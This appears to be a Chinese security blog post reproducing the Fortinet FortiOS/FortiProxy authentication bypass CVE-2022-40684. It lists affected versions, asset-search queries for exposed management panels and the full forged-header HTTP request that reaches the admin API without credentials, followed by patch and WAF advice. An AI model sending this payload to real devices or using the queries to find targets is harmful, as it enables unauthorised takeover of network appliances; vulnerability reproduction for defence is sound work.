Fortinet(飞塔)身份验证绕过漏洞(CVE-2022-40684)复现

admin 2022年11月15日12:05:14评论516 views字数 923阅读3分4秒阅读模式
Fortinet(飞塔)身份验证绕过漏洞(CVE-2022-40684)复现

漏洞描述

Fortinet(飞塔)身份验证绕过漏洞(CVE-2022-40684)复现


Fortinet(飞塔)是一家全球知名的网络安全产品和安全解决方案提供商,其产品包括防火墙、防病毒软件、入侵防御系统和终端安全组件等。在受影响的FortiOS、FortiProxy 和 FortiSwitchManager产品的管理界面中,可以通过使用备用路径或通道绕过身份验证,并在未经认证的情况下通过特制的HTTP或HTTPS请求对管理界面进行操作。

Fortinet(飞塔)身份验证绕过漏洞(CVE-2022-40684)复现
Fortinet(飞塔)身份验证绕过漏洞(CVE-2022-40684)复现

漏洞复现

Fortinet(飞塔)身份验证绕过漏洞(CVE-2022-40684)复现


一、资产搜索

title="FortiProxy“

title="FortiGate"


二、漏洞影响版本

FortiOS 版本 7.2.0 - 7.2.1

FortiOS 版本 7.0.0 - 7.0.6

FortiProxy 版本 7.2.0

FortiProxy 版本 7.0.0 - 7.0.6

FortiSwitchManager 版本 7.2.0

FortiSwitchManager 版本 7.0.0


三、漏洞复现

1.访问目标IP

Fortinet(飞塔)身份验证绕过漏洞(CVE-2022-40684)复现

2、修改参数并抓包

Fortinet(飞塔)身份验证绕过漏洞(CVE-2022-40684)复现

payload:GET /api/v2/cmdb/system/admin HTTP/1.1Host: 目标User-Agent: Node.jsAccept-Encoding: gzip, deflateAccept: */*Hosts: 127.0.0.1:9980Forwarded:by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=X-Forwarded-Vdom: root


四、修复建议

建议受影响的用户及时升级版本安装补丁由于User-Agent的值固定,Forwarded和X-Forwarded-Vdom存在,所以特征还是很明显的,设置WAF策略应该也是不容易绕过的

参考地址http://cn-sec.com/archives/1380917.htmlhttps://github.com/hughink/CVE-2022-40684


Fortinet(飞塔)身份验证绕过漏洞(CVE-2022-40684)复现

Fortinet(飞塔)身份验证绕过漏洞(CVE-2022-40684)复现

END

Fortinet(飞塔)身份验证绕过漏洞(CVE-2022-40684)复现

• 往期精选

Fortinet(飞塔)身份验证绕过漏洞(CVE-2022-40684)复现
Fortinet(飞塔)身份验证绕过漏洞(CVE-2022-40684)复现

windows提权总结

一次SSH爆破攻击haiduc工具的应急响应

记一次艰难的SQL注入(过安全狗)

记一次溯源

Fortinet(飞塔)身份验证绕过漏洞(CVE-2022-40684)复现

下方点击关注发现更多精彩

原文始发于微信公众号(银河护卫队super):Fortinet(飞塔)身份验证绕过漏洞(CVE-2022-40684)复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月15日12:05:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Fortinet(飞塔)身份验证绕过漏洞(CVE-2022-40684)复现http://cn-sec.com/archives/1410598.html

发表评论

匿名网友 填写信息